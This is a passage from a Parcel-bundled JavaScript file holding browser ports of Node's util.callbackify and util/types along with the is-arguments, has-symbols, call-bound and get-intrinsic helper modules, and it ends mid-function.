        original.apply(this, args).then(function(ret) {
            $hPtJY.nextTick(cb.bind(null, null, ret));
        }, function(rej) {
            $hPtJY.nextTick($093a98c17cb6b6b8$var$callbackifyOnRejected.bind(null, rej, cb));
        });
    }
    Object.setPrototypeOf(callbackified, Object.getPrototypeOf(original));
    Object.defineProperties(callbackified, $093a98c17cb6b6b8$var$getOwnPropertyDescriptors(original));
    return callbackified;
}
module.exports.callbackify = $093a98c17cb6b6b8$var$callbackify;

});
parcelRequire.register("7He6T", function(module, exports) {
// Currently in sync with Node.js lib/internal/util/types.js
// https://github.com/nodejs/node/commit/112cc7c27551254aa2b17098fb774867f05ed0d9
"use strict";

var $f4HGZ = parcelRequire("f4HGZ");

var $5WnCa = parcelRequire("5WnCa");

var $gJrpv = parcelRequire("gJrpv");

var $hN833 = parcelRequire("hN833");
function $59a77e8886024a57$var$uncurryThis(f) {
    return f.call.bind(f);
}
var $59a77e8886024a57$var$BigIntSupported = typeof BigInt !== "undefined";
var $59a77e8886024a57$var$SymbolSupported = typeof Symbol !== "undefined";
var $59a77e8886024a57$var$ObjectToString = $59a77e8886024a57$var$uncurryThis(Object.prototype.toString);
var $59a77e8886024a57$var$numberValue = $59a77e8886024a57$var$uncurryThis(Number.prototype.valueOf);
var $59a77e8886024a57$var$stringValue = $59a77e8886024a57$var$uncurryThis(String.prototype.valueOf);
var $59a77e8886024a57$var$booleanValue = $59a77e8886024a57$var$uncurryThis(Boolean.prototype.valueOf);
if ($59a77e8886024a57$var$BigIntSupported) var $59a77e8886024a57$var$bigIntValue = $59a77e8886024a57$var$uncurryThis(BigInt.prototype.valueOf);
if ($59a77e8886024a57$var$SymbolSupported) var $59a77e8886024a57$var$symbolValue = $59a77e8886024a57$var$uncurryThis(Symbol.prototype.valueOf);
function $59a77e8886024a57$var$checkBoxedPrimitive(value, prototypeValueOf) {
    if (typeof value !== "object") return false;
    try {
        prototypeValueOf(value);
        return true;
    } catch (e) {
        return false;
    }
}
module.exports.isArgumentsObject = $f4HGZ;
module.exports.isGeneratorFunction = $5WnCa;
module.exports.isTypedArray = $hN833;
// Taken from here and modified for better browser support
// https://github.com/sindresorhus/p-is-promise/blob/cda35a513bda03f977ad5cde3a079d237e82d7ef/index.js
function $59a77e8886024a57$var$isPromise(input) {
    return typeof Promise !== "undefined" && input instanceof Promise || input !== null && typeof input === "object" && typeof input.then === "function" && typeof input.catch === "function";
}
module.exports.isPromise = $59a77e8886024a57$var$isPromise;
function $59a77e8886024a57$var$isArrayBufferView(value) {
    if (typeof ArrayBuffer !== "undefined" && ArrayBuffer.isView) return ArrayBuffer.isView(value);
    return $hN833(value) || $59a77e8886024a57$var$isDataView(value);
}
module.exports.isArrayBufferView = $59a77e8886024a57$var$isArrayBufferView;
function $59a77e8886024a57$var$isUint8Array(value) {
    return $gJrpv(value) === "Uint8Array";
}
module.exports.isUint8Array = $59a77e8886024a57$var$isUint8Array;
function $59a77e8886024a57$var$isUint8ClampedArray(value) {
    return $gJrpv(value) === "Uint8ClampedArray";
}
module.exports.isUint8ClampedArray = $59a77e8886024a57$var$isUint8ClampedArray;
function $59a77e8886024a57$var$isUint16Array(value) {
    return $gJrpv(value) === "Uint16Array";
}
module.exports.isUint16Array = $59a77e8886024a57$var$isUint16Array;
function $59a77e8886024a57$var$isUint32Array(value) {
    return $gJrpv(value) === "Uint32Array";
}
module.exports.isUint32Array = $59a77e8886024a57$var$isUint32Array;
function $59a77e8886024a57$var$isInt8Array(value) {
    return $gJrpv(value) === "Int8Array";
}
module.exports.isInt8Array = $59a77e8886024a57$var$isInt8Array;
function $59a77e8886024a57$var$isInt16Array(value) {
    return $gJrpv(value) === "Int16Array";
}
module.exports.isInt16Array = $59a77e8886024a57$var$isInt16Array;
function $59a77e8886024a57$var$isInt32Array(value) {
    return $gJrpv(value) === "Int32Array";
}
module.exports.isInt32Array = $59a77e8886024a57$var$isInt32Array;
function $59a77e8886024a57$var$isFloat32Array(value) {
    return $gJrpv(value) === "Float32Array";
}
module.exports.isFloat32Array = $59a77e8886024a57$var$isFloat32Array;
function $59a77e8886024a57$var$isFloat64Array(value) {
    return $gJrpv(value) === "Float64Array";
}
module.exports.isFloat64Array = $59a77e8886024a57$var$isFloat64Array;
function $59a77e8886024a57$var$isBigInt64Array(value) {
    return $gJrpv(value) === "BigInt64Array";
}
module.exports.isBigInt64Array = $59a77e8886024a57$var$isBigInt64Array;
function $59a77e8886024a57$var$isBigUint64Array(value) {
    return $gJrpv(value) === "BigUint64Array";
}
module.exports.isBigUint64Array = $59a77e8886024a57$var$isBigUint64Array;
function $59a77e8886024a57$var$isMapToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object Map]";
}
$59a77e8886024a57$var$isMapToString.working = typeof Map !== "undefined" && $59a77e8886024a57$var$isMapToString(new Map());
function $59a77e8886024a57$var$isMap(value) {
    if (typeof Map === "undefined") return false;
    return $59a77e8886024a57$var$isMapToString.working ? $59a77e8886024a57$var$isMapToString(value) : value instanceof Map;
}
module.exports.isMap = $59a77e8886024a57$var$isMap;
function $59a77e8886024a57$var$isSetToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object Set]";
}
$59a77e8886024a57$var$isSetToString.working = typeof Set !== "undefined" && $59a77e8886024a57$var$isSetToString(new Set());
function $59a77e8886024a57$var$isSet(value) {
    if (typeof Set === "undefined") return false;
    return $59a77e8886024a57$var$isSetToString.working ? $59a77e8886024a57$var$isSetToString(value) : value instanceof Set;
}
module.exports.isSet = $59a77e8886024a57$var$isSet;
function $59a77e8886024a57$var$isWeakMapToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object WeakMap]";
}
$59a77e8886024a57$var$isWeakMapToString.working = typeof WeakMap !== "undefined" && $59a77e8886024a57$var$isWeakMapToString(new WeakMap());
function $59a77e8886024a57$var$isWeakMap(value) {
    if (typeof WeakMap === "undefined") return false;
    return $59a77e8886024a57$var$isWeakMapToString.working ? $59a77e8886024a57$var$isWeakMapToString(value) : value instanceof WeakMap;
}
module.exports.isWeakMap = $59a77e8886024a57$var$isWeakMap;
function $59a77e8886024a57$var$isWeakSetToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object WeakSet]";
}
$59a77e8886024a57$var$isWeakSetToString.working = typeof WeakSet !== "undefined" && $59a77e8886024a57$var$isWeakSetToString(new WeakSet());
function $59a77e8886024a57$var$isWeakSet(value) {
    return $59a77e8886024a57$var$isWeakSetToString(value);
}
module.exports.isWeakSet = $59a77e8886024a57$var$isWeakSet;
function $59a77e8886024a57$var$isArrayBufferToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object ArrayBuffer]";
}
$59a77e8886024a57$var$isArrayBufferToString.working = typeof ArrayBuffer !== "undefined" && $59a77e8886024a57$var$isArrayBufferToString(new ArrayBuffer());
function $59a77e8886024a57$var$isArrayBuffer(value) {
    if (typeof ArrayBuffer === "undefined") return false;
    return $59a77e8886024a57$var$isArrayBufferToString.working ? $59a77e8886024a57$var$isArrayBufferToString(value) : value instanceof ArrayBuffer;
}
module.exports.isArrayBuffer = $59a77e8886024a57$var$isArrayBuffer;
function $59a77e8886024a57$var$isDataViewToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object DataView]";
}
$59a77e8886024a57$var$isDataViewToString.working = typeof ArrayBuffer !== "undefined" && typeof DataView !== "undefined" && $59a77e8886024a57$var$isDataViewToString(new DataView(new ArrayBuffer(1), 0, 1));
function $59a77e8886024a57$var$isDataView(value) {
    if (typeof DataView === "undefined") return false;
    return $59a77e8886024a57$var$isDataViewToString.working ? $59a77e8886024a57$var$isDataViewToString(value) : value instanceof DataView;
}
module.exports.isDataView = $59a77e8886024a57$var$isDataView;
// Store a copy of SharedArrayBuffer in case it's deleted elsewhere
var $59a77e8886024a57$var$SharedArrayBufferCopy = typeof SharedArrayBuffer !== "undefined" ? SharedArrayBuffer : undefined;
function $59a77e8886024a57$var$isSharedArrayBufferToString(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object SharedArrayBuffer]";
}
function $59a77e8886024a57$var$isSharedArrayBuffer(value) {
    if (typeof $59a77e8886024a57$var$SharedArrayBufferCopy === "undefined") return false;
    if (typeof $59a77e8886024a57$var$isSharedArrayBufferToString.working === "undefined") $59a77e8886024a57$var$isSharedArrayBufferToString.working = $59a77e8886024a57$var$isSharedArrayBufferToString(new $59a77e8886024a57$var$SharedArrayBufferCopy());
    return $59a77e8886024a57$var$isSharedArrayBufferToString.working ? $59a77e8886024a57$var$isSharedArrayBufferToString(value) : value instanceof $59a77e8886024a57$var$SharedArrayBufferCopy;
}
module.exports.isSharedArrayBuffer = $59a77e8886024a57$var$isSharedArrayBuffer;
function $59a77e8886024a57$var$isAsyncFunction(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object AsyncFunction]";
}
module.exports.isAsyncFunction = $59a77e8886024a57$var$isAsyncFunction;
function $59a77e8886024a57$var$isMapIterator(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object Map Iterator]";
}
module.exports.isMapIterator = $59a77e8886024a57$var$isMapIterator;
function $59a77e8886024a57$var$isSetIterator(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object Set Iterator]";
}
module.exports.isSetIterator = $59a77e8886024a57$var$isSetIterator;
function $59a77e8886024a57$var$isGeneratorObject(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object Generator]";
}
module.exports.isGeneratorObject = $59a77e8886024a57$var$isGeneratorObject;
function $59a77e8886024a57$var$isWebAssemblyCompiledModule(value) {
    return $59a77e8886024a57$var$ObjectToString(value) === "[object WebAssembly.Module]";
}
module.exports.isWebAssemblyCompiledModule = $59a77e8886024a57$var$isWebAssemblyCompiledModule;
function $59a77e8886024a57$var$isNumberObject(value) {
    return $59a77e8886024a57$var$checkBoxedPrimitive(value, $59a77e8886024a57$var$numberValue);
}
module.exports.isNumberObject = $59a77e8886024a57$var$isNumberObject;
function $59a77e8886024a57$var$isStringObject(value) {
    return $59a77e8886024a57$var$checkBoxedPrimitive(value, $59a77e8886024a57$var$stringValue);
}
module.exports.isStringObject = $59a77e8886024a57$var$isStringObject;
function $59a77e8886024a57$var$isBooleanObject(value) {
    return $59a77e8886024a57$var$checkBoxedPrimitive(value, $59a77e8886024a57$var$booleanValue);
}
module.exports.isBooleanObject = $59a77e8886024a57$var$isBooleanObject;
function $59a77e8886024a57$var$isBigIntObject(value) {
    return $59a77e8886024a57$var$BigIntSupported && $59a77e8886024a57$var$checkBoxedPrimitive(value, $59a77e8886024a57$var$bigIntValue);
}
module.exports.isBigIntObject = $59a77e8886024a57$var$isBigIntObject;
function $59a77e8886024a57$var$isSymbolObject(value) {
    return $59a77e8886024a57$var$SymbolSupported && $59a77e8886024a57$var$checkBoxedPrimitive(value, $59a77e8886024a57$var$symbolValue);
}
module.exports.isSymbolObject = $59a77e8886024a57$var$isSymbolObject;
function $59a77e8886024a57$var$isBoxedPrimitive(value) {
    return $59a77e8886024a57$var$isNumberObject(value) || $59a77e8886024a57$var$isStringObject(value) || $59a77e8886024a57$var$isBooleanObject(value) || $59a77e8886024a57$var$isBigIntObject(value) || $59a77e8886024a57$var$isSymbolObject(value);
}
module.exports.isBoxedPrimitive = $59a77e8886024a57$var$isBoxedPrimitive;
function $59a77e8886024a57$var$isAnyArrayBuffer(value) {
    return typeof Uint8Array !== "undefined" && ($59a77e8886024a57$var$isArrayBuffer(value) || $59a77e8886024a57$var$isSharedArrayBuffer(value));
}
module.exports.isAnyArrayBuffer = $59a77e8886024a57$var$isAnyArrayBuffer;
[
    "isProxy",
    "isExternal",
    "isModuleNamespaceObject"
].forEach(function(method) {
    Object.defineProperty(module.exports, method, {
        enumerable: false,
        value: function() {
            throw new Error(method + " is not supported in userland");
        }
    });
});

});
parcelRequire.register("f4HGZ", function(module, exports) {
"use strict";

var $af991f1d6c80f097$var$hasToStringTag = (parcelRequire("3KyxH"))();

var $hXu6F = parcelRequire("hXu6F");
var $af991f1d6c80f097$var$$toString = $hXu6F("Object.prototype.toString");
var $af991f1d6c80f097$var$isStandardArguments = function isArguments(value) {
    if ($af991f1d6c80f097$var$hasToStringTag && value && typeof value === "object" && Symbol.toStringTag in value) return false;
    return $af991f1d6c80f097$var$$toString(value) === "[object Arguments]";
};
var $af991f1d6c80f097$var$isLegacyArguments = function isArguments(value) {
    if ($af991f1d6c80f097$var$isStandardArguments(value)) return true;
    return value !== null && typeof value === "object" && typeof value.length === "number" && value.length >= 0 && $af991f1d6c80f097$var$$toString(value) !== "[object Array]" && $af991f1d6c80f097$var$$toString(value.callee) === "[object Function]";
};
var $af991f1d6c80f097$var$supportsStandardArguments = function() {
    return $af991f1d6c80f097$var$isStandardArguments(arguments);
}();
$af991f1d6c80f097$var$isStandardArguments.isLegacyArguments = $af991f1d6c80f097$var$isLegacyArguments; // for tests
module.exports = $af991f1d6c80f097$var$supportsStandardArguments ? $af991f1d6c80f097$var$isStandardArguments : $af991f1d6c80f097$var$isLegacyArguments;

});
parcelRequire.register("3KyxH", function(module, exports) {
"use strict";

var $7YWkK = parcelRequire("7YWkK");
module.exports = function hasToStringTagShams() {
    return $7YWkK() && !!Symbol.toStringTag;
};

});
parcelRequire.register("7YWkK", function(module, exports) {
"use strict";
/* eslint complexity: [2, 18], max-statements: [2, 33] */ module.exports = function hasSymbols() {
    if (typeof Symbol !== "function" || typeof Object.getOwnPropertySymbols !== "function") return false;
    if (typeof Symbol.iterator === "symbol") return true;
    var obj = {};
    var sym = Symbol("test");
    var symObj = Object(sym);
    if (typeof sym === "string") return false;
    if (Object.prototype.toString.call(sym) !== "[object Symbol]") return false;
    if (Object.prototype.toString.call(symObj) !== "[object Symbol]") return false;
    // temp disabled per https://github.com/ljharb/object.assign/issues/17
    // if (sym instanceof Symbol) { return false; }
    // temp disabled per https://github.com/WebReflection/get-own-property-symbols/issues/4
    // if (!(symObj instanceof Symbol)) { return false; }
    // if (typeof Symbol.prototype.toString !== 'function') { return false; }
    // if (String(sym) !== Symbol.prototype.toString.call(sym)) { return false; }
    var symVal = 42;
    obj[sym] = symVal;
    for(sym in obj)return false;
     // eslint-disable-line no-restricted-syntax, no-unreachable-loop
    if (typeof Object.keys === "function" && Object.keys(obj).length !== 0) return false;
    if (typeof Object.getOwnPropertyNames === "function" && Object.getOwnPropertyNames(obj).length !== 0) return false;
    var syms = Object.getOwnPropertySymbols(obj);
    if (syms.length !== 1 || syms[0] !== sym) return false;
    if (!Object.prototype.propertyIsEnumerable.call(obj, sym)) return false;
    if (typeof Object.getOwnPropertyDescriptor === "function") {
        var descriptor = Object.getOwnPropertyDescriptor(obj, sym);
        if (descriptor.value !== symVal || descriptor.enumerable !== true) return false;
    }
    return true;
};

});


parcelRequire.register("hXu6F", function(module, exports) {
"use strict";

var $1zENl = parcelRequire("1zENl");

var $cOB0F = parcelRequire("cOB0F");
var $d12f4cdcd6b10506$var$$indexOf = $cOB0F($1zENl("String.prototype.indexOf"));
module.exports = function callBoundIntrinsic(name, allowMissing) {
    var intrinsic = $1zENl(name, !!allowMissing);
    if (typeof intrinsic === "function" && $d12f4cdcd6b10506$var$$indexOf(name, ".prototype.") > -1) return $cOB0F(intrinsic);
    return intrinsic;
};

});
parcelRequire.register("1zENl", function(module, exports) {
"use strict";
var $1258b452ecf218a1$var$undefined;
var $1258b452ecf218a1$var$$SyntaxError = SyntaxError;
var $1258b452ecf218a1$var$$Function = Function;
var $1258b452ecf218a1$var$$TypeError = TypeError;
// eslint-disable-next-line consistent-return
var $1258b452ecf218a1$var$getEvalledConstructor = function(expressionSyntax) {
    try {
        return $1258b452ecf218a1$var$$Function('"use strict"; return (' + expressionSyntax + ").constructor;")();
    } catch (e) {}
};
var $1258b452ecf218a1$var$$gOPD = Object.getOwnPropertyDescriptor;
if ($1258b452ecf218a1$var$$gOPD) try {
    $1258b452ecf218a1$var$$gOPD({}, "");
} catch (e) {
    $1258b452ecf218a1$var$$gOPD = null; // this is IE 8, which has a broken gOPD
}
var $1258b452ecf218a1$var$throwTypeError = function() {
    throw new $1258b452ecf218a1$var$$TypeError();
};
var $1258b452ecf218a1$var$ThrowTypeError = $1258b452ecf218a1$var$$gOPD ? function() {
    try {
        // eslint-disable-next-line no-unused-expressions, no-caller, no-restricted-properties
        arguments.callee; // IE 8 does not throw here
        return $1258b452ecf218a1$var$throwTypeError;
    } catch (calleeThrows) {
        try {
            // IE 8 throws on Object.getOwnPropertyDescriptor(arguments, '')
            return $1258b452ecf218a1$var$$gOPD(arguments, "callee").get;
        } catch (gOPDthrows) {
            return $1258b452ecf218a1$var$throwTypeError;
        }
    }
}() : $1258b452ecf218a1$var$throwTypeError;

var $1258b452ecf218a1$var$hasSymbols = (parcelRequire("24qIq"))();

var $1258b452ecf218a1$var$hasProto = (parcelRequire("dSRh6"))();
var $1258b452ecf218a1$var$getProto = Object.getPrototypeOf || ($1258b452ecf218a1$var$hasProto ? function(x) {
    return x.__proto__;
} // eslint-disable-line no-proto
 : null);
var $1258b452ecf218a1$var$needsEval = {};
var $1258b452ecf218a1$var$TypedArray = typeof Uint8Array === "undefined" || !$1258b452ecf218a1$var$getProto ? $1258b452ecf218a1$var$undefined : $1258b452ecf218a1$var$getProto(Uint8Array);
var $1258b452ecf218a1$var$INTRINSICS = {
    "%AggregateError%": typeof AggregateError === "undefined" ? $1258b452ecf218a1$var$undefined : AggregateError,
    "%Array%": Array,
    "%ArrayBuffer%": typeof ArrayBuffer === "undefined" ? $1258b452ecf218a1$var$undefined : ArrayBuffer,
    "%ArrayIteratorPrototype%": $1258b452ecf218a1$var$hasSymbols && $1258b452ecf218a1$var$getProto ? $1258b452ecf218a1$var$getProto([][Symbol.iterator]()) : $1258b452ecf218a1$var$undefined,
    "%AsyncFromSyncIteratorPrototype%": $1258b452ecf218a1$var$undefined,
    "%AsyncFunction%": $1258b452ecf218a1$var$needsEval,
    "%AsyncGenerator%": $1258b452ecf218a1$var$needsEval,
    "%AsyncGeneratorFunction%": $1258b452ecf218a1$var$needsEval,
    "%AsyncIteratorPrototype%": $1258b452ecf218a1$var$needsEval,
    "%Atomics%": typeof Atomics === "undefined" ? $1258b452ecf218a1$var$undefined : Atomics,
    "%BigInt%": typeof BigInt === "undefined" ? $1258b452ecf218a1$var$undefined : BigInt,
    "%BigInt64Array%": typeof BigInt64Array === "undefined" ? $1258b452ecf218a1$var$undefined : BigInt64Array,
    "%BigUint64Array%": typeof BigUint64Array === "undefined" ? $1258b452ecf218a1$var$undefined : BigUint64Array,
    "%Boolean%": Boolean,
    "%DataView%": typeof DataView === "undefined" ? $1258b452ecf218a1$var$undefined : DataView,
    "%Date%": Date,
    "%decodeURI%": decodeURI,
    "%decodeURIComponent%": decodeURIComponent,
    "%encodeURI%": encodeURI,
    "%encodeURIComponent%": encodeURIComponent,
    "%Error%": Error,
    "%eval%": eval,
    "%EvalError%": EvalError,
    "%Float32Array%": typeof Float32Array === "undefined" ? $1258b452ecf218a1$var$undefined : Float32Array,
    "%Float64Array%": typeof Float64Array === "undefined" ? $1258b452ecf218a1$var$undefined : Float64Array,
    "%FinalizationRegistry%": typeof FinalizationRegistry === "undefined" ? $1258b452ecf218a1$var$undefined : FinalizationRegistry,
    "%Function%": $1258b452ecf218a1$var$$Function,
    "%GeneratorFunction%": $1258b452ecf218a1$var$needsEval,
    "%Int8Array%": typeof Int8Array === "undefined" ? $1258b452ecf218a1$var$undefined : Int8Array,
    "%Int16Array%": typeof Int16Array === "undefined" ? $1258b452ecf218a1$var$undefined : Int16Array,
    "%Int32Array%": typeof Int32Array === "undefined" ? $1258b452ecf218a1$var$undefined : Int32Array,
    "%isFinite%": isFinite,
    "%isNaN%": isNaN,
    "%IteratorPrototype%": $1258b452ecf218a1$var$hasSymbols && $1258b452ecf218a1$var$getProto ? $1258b452ecf218a1$var$getProto($1258b452ecf218a1$var$getProto([][Symbol.iterator]())) : $1258b452ecf218a1$var$undefined,
    "%JSON%": typeof JSON === "object" ? JSON : $1258b452ecf218a1$var$undefined,
    "%Map%": typeof Map === "undefined" ? $1258b452ecf218a1$var$undefined : Map,
    "%MapIteratorPrototype%": typeof Map === "undefined" || !$1258b452ecf218a1$var$hasSymbols || !$1258b452ecf218a1$var$getProto ? $1258b452ecf218a1$var$undefined : $1258b452ecf218a1$var$getProto(new Map()[Symbol.iterator]()),
    "%Math%": Math,
    "%Number%": Number,
    "%Object%": Object,
    "%parseFloat%": parseFloat,
    "%parseInt%": parseInt,
    "%Promise%": typeof Promise === "undefined" ? $1258b452ecf218a1$var$undefined : Promise,
    "%Proxy%": typeof Proxy === "undefined" ? $1258b452ecf218a1$var$undefined : Proxy,
    "%RangeError%": RangeError,
    "%ReferenceError%": ReferenceError,
    "%Reflect%": typeof Reflect === "undefined" ? $1258b452ecf218a1$var$undefined : Reflect,
    "%RegExp%": RegExp,
    "%Set%": typeof Set === "undefined" ? $1258b452ecf218a1$var$undefined : Set,
    "%SetIteratorPrototype%": typeof Set === "undefined" || !$1258b452ecf218a1$var$hasSymbols || !$1258b452ecf218a1$var$getProto ? $1258b452ecf218a1$var$undefined : $1258b452ecf218a1$var$getProto(new Set()[Symbol.iterator]()),
    "%SharedArrayBuffer%": typeof SharedArrayBuffer === "undefined" ? $1258b452ecf218a1$var$undefined : SharedArrayBuffer,
    "%String%": String,
    "%StringIteratorPrototype%": $1258b452ecf218a1$var$hasSymbols && $1258b452ecf218a1$var$getProto ? $1258b452ecf218a1$var$getProto(""[Symbol.iterator]()) : $1258b452ecf218a1$var$undefined,
    "%Symbol%": $1258b452ecf218a1$var$hasSymbols ? Symbol : $1258b452ecf218a1$var$undefined,
    "%SyntaxError%": $1258b452ecf218a1$var$$SyntaxError,
    "%ThrowTypeError%": $1258b452ecf218a1$var$ThrowTypeError,
    "%TypedArray%": $1258b452ecf218a1$var$TypedArray,
    "%TypeError%": $1258b452ecf218a1$var$$TypeError,
    "%Uint8Array%": typeof Uint8Array === "undefined" ? $1258b452ecf218a1$var$undefined : Uint8Array,
    "%Uint8ClampedArray%": typeof Uint8ClampedArray === "undefined" ? $1258b452ecf218a1$var$undefined : Uint8ClampedArray,
    "%Uint16Array%": typeof Uint16Array === "undefined" ? $1258b452ecf218a1$var$undefined : Uint16Array,
    "%Uint32Array%": typeof Uint32Array === "undefined" ? $1258b452ecf218a1$var$undefined : Uint32Array,
    "%URIError%": URIError,
    "%WeakMap%": typeof WeakMap === "undefined" ? $1258b452ecf218a1$var$undefined : WeakMap,
    "%WeakRef%": typeof WeakRef === "undefined" ? $1258b452ecf218a1$var$undefined : WeakRef,
    "%WeakSet%": typeof WeakSet === "undefined" ? $1258b452ecf218a1$var$undefined : WeakSet
};
if ($1258b452ecf218a1$var$getProto) try {
    null.error; // eslint-disable-line no-unused-expressions
} catch (e) {
    // https://github.com/tc39/proposal-shadowrealm/pull/384#issuecomment-1364264229
    var $1258b452ecf218a1$var$errorProto = $1258b452ecf218a1$var$getProto($1258b452ecf218a1$var$getProto(e));
    $1258b452ecf218a1$var$INTRINSICS["%Error.prototype%"] = $1258b452ecf218a1$var$errorProto;
}
var $1258b452ecf218a1$var$doEval = function doEval(name) {
    var value;
    if (name === "%AsyncFunction%") value = $1258b452ecf218a1$var$getEvalledConstructor("async function () {}");
    else if (name === "%GeneratorFunction%") value = $1258b452ecf218a1$var$getEvalledConstructor("function* () {}");
    else if (name === "%AsyncGeneratorFunction%") value = $1258b452ecf218a1$var$getEvalledConstructor("async function* () {}");
    else if (name === "%AsyncGenerator%") {
        var fn = doEval("%AsyncGeneratorFunction%");
        if (fn) value = fn.prototype;
    } else if (name === "%AsyncIteratorPrototype%") {
        var gen = doEval("%AsyncGenerator%");
        if (gen && $1258b452ecf218a1$var$getProto) value = $1258b452ecf218a1$var$getProto(gen.prototype);
    }
    $1258b452ecf218a1$var$INTRINSICS[name] = value;
    return value;
};
var $1258b452ecf218a1$var$LEGACY_ALIASES = {
    "%ArrayBufferPrototype%": [
        "ArrayBuffer",
        "prototype"
    ],
    "%ArrayPrototype%": [
        "Array",
        "prototype"
    ],
    "%ArrayProto_entries%": [
        "Array",
        "prototype",
        "entries"
    ],
    "%ArrayProto_forEach%": [
        "Array",
        "prototype",
        "forEach"
    ],
    "%ArrayProto_keys%": [
        "Array",
        "prototype",
        "keys"
    ],
    "%ArrayProto_values%": [
        "Array",
        "prototype",
        "values"
    ],
    "%AsyncFunctionPrototype%": [
        "AsyncFunction",
        "prototype"
    ],
    "%AsyncGenerator%": [
        "AsyncGeneratorFunction",
        "prototype"
    ],
    "%AsyncGeneratorPrototype%": [
        "AsyncGeneratorFunction",
        "prototype",
        "prototype"
    ],
    "%BooleanPrototype%": [
        "Boolean",
        "prototype"
    ],
    "%DataViewPrototype%": [
        "DataView",
        "prototype"
    ],
    "%DatePrototype%": [
        "Date",
        "prototype"
    ],
    "%ErrorPrototype%": [
        "Error",
        "prototype"
    ],
    "%EvalErrorPrototype%": [
        "EvalError",
        "prototype"
    ],
    "%Float32ArrayPrototype%": [
        "Float32Array",
        "prototype"
    ],
    "%Float64ArrayPrototype%": [
        "Float64Array",
        "prototype"
    ],
    "%FunctionPrototype%": [
        "Function",
        "prototype"
    ],
    "%Generator%": [
        "GeneratorFunction",
        "prototype"
    ],
    "%GeneratorPrototype%": [
        "GeneratorFunction",
        "prototype",
        "prototype"
    ],
    "%Int8ArrayPrototype%": [
        "Int8Array",
        "prototype"
    ],
    "%Int16ArrayPrototype%": [
        "Int16Array",
        "prototype"
    ],
    "%Int32ArrayPrototype%": [
        "Int32Array",
        "prototype"
    ],
    "%JSONParse%": [
        "JSON",
        "parse"
    ],
    "%JSONStringify%": [
        "JSON",
        "stringify"
    ],
    "%MapPrototype%": [
        "Map",
        "prototype"
    ],
    "%NumberPrototype%": [
        "Number",
        "prototype"
    ],
    "%ObjectPrototype%": [
        "Object",
        "prototype"
    ],
    "%ObjProto_toString%": [
        "Object",
        "prototype",
        "toString"
    ],
    "%ObjProto_valueOf%": [
        "Object",
        "prototype",
        "valueOf"
    ],
    "%PromisePrototype%": [
        "Promise",
        "prototype"
    ],
    "%PromiseProto_then%": [
        "Promise",
        "prototype",
        "then"
    ],
    "%Promise_all%": [
        "Promise",
        "all"
    ],
    "%Promise_reject%": [
        "Promise",
        "reject"
    ],
    "%Promise_resolve%": [
        "Promise",
        "resolve"
    ],
    "%RangeErrorPrototype%": [
        "RangeError",
        "prototype"
    ],
    "%ReferenceErrorPrototype%": [
        "ReferenceError",
        "prototype"
    ],
    "%RegExpPrototype%": [
        "RegExp",
        "prototype"
    ],
    "%SetPrototype%": [
        "Set",
        "prototype"
    ],
    "%SharedArrayBufferPrototype%": [
        "SharedArrayBuffer",
        "prototype"
    ],
    "%StringPrototype%": [
        "String",
        "prototype"
    ],
    "%SymbolPrototype%": [
        "Symbol",
        "prototype"
    ],
    "%SyntaxErrorPrototype%": [
        "SyntaxError",
        "prototype"
    ],
    "%TypedArrayPrototype%": [
        "TypedArray",
        "prototype"
    ],
    "%TypeErrorPrototype%": [
        "TypeError",
        "prototype"
    ],
    "%Uint8ArrayPrototype%": [
        "Uint8Array",
        "prototype"
    ],
    "%Uint8ClampedArrayPrototype%": [
        "Uint8ClampedArray",
        "prototype"
    ],
    "%Uint16ArrayPrototype%": [
        "Uint16Array",
        "prototype"
    ],
    "%Uint32ArrayPrototype%": [
        "Uint32Array",
        "prototype"
    ],
    "%URIErrorPrototype%": [
        "URIError",
        "prototype"
    ],
    "%WeakMapPrototype%": [
        "WeakMap",
        "prototype"
    ],
    "%WeakSetPrototype%": [
        "WeakSet",
        "prototype"
    ]
};

var $gvair = parcelRequire("gvair");

var $8aKn2 = parcelRequire("8aKn2");
var $1258b452ecf218a1$var$$concat = $gvair.call(Function.call, Array.prototype.concat);
var $1258b452ecf218a1$var$$spliceApply = $gvair.call(Function.apply, Array.prototype.splice);
var $1258b452ecf218a1$var$$replace = $gvair.call(Function.call, String.prototype.replace);
var $1258b452ecf218a1$var$$strSlice = $gvair.call(Function.call, String.prototype.slice);
var $1258b452ecf218a1$var$$exec = $gvair.call(Function.call, RegExp.prototype.exec);
/* adapted from https://github.com/lodash/lodash/blob/4.17.15/dist/lodash.js#L6735-L6744 */ var $1258b452ecf218a1$var$rePropName = /[^%.[\]]+|\[(?:(-?\d+(?:\.\d+)?)|(["'])((?:(?!\2)[^\\]|\\.)*?)\2)\]|(?=(?:\.|\[\])(?:\.|\[\]|%$))/g;
var $1258b452ecf218a1$var$reEscapeChar = /\\(\\)?/g; /** Used to match backslashes in property paths. */ 
var $1258b452ecf218a1$var$stringToPath = function stringToPath(string) {
    var first = $1258b452ecf218a1$var$$strSlice(string, 0, 1);
    var last = $1258b452ecf218a1$var$$strSlice(string, -1);
    if (first === "%" && last !== "%") throw new $1258b452ecf218a1$var$$SyntaxError("invalid intrinsic syntax, expected closing `%`");
    else if (last === "%" && first !== "%") throw new $1258b452ecf218a1$var$$SyntaxError("invalid intrinsic syntax, expected opening `%`");
    var result = [];
    $1258b452ecf218a1$var$$replace(string, $1258b452ecf218a1$var$rePropName, function(match, number, quote, subString) {
        result[result.length] = quote ? $1258b452ecf218a1$var$$replace(subString, $1258b452ecf218a1$var$reEscapeChar, "$1") : number || match;
    });
    return result;
};
/* end adaptation */ var $1258b452ecf218a1$var$getBaseIntrinsic = function getBaseIntrinsic(name, allowMissing) {
    var intrinsicName = name;
    var alias;
    if ($8aKn2($1258b452ecf218a1$var$LEGACY_ALIASES, intrinsicName)) {
        alias = $1258b452ecf218a1$var$LEGACY_ALIASES[intrinsicName];
        intrinsicName = "%" + alias[0] + "%";
    }
    if ($8aKn2($1258b452ecf218a1$var$INTRINSICS, intrinsicName)) {
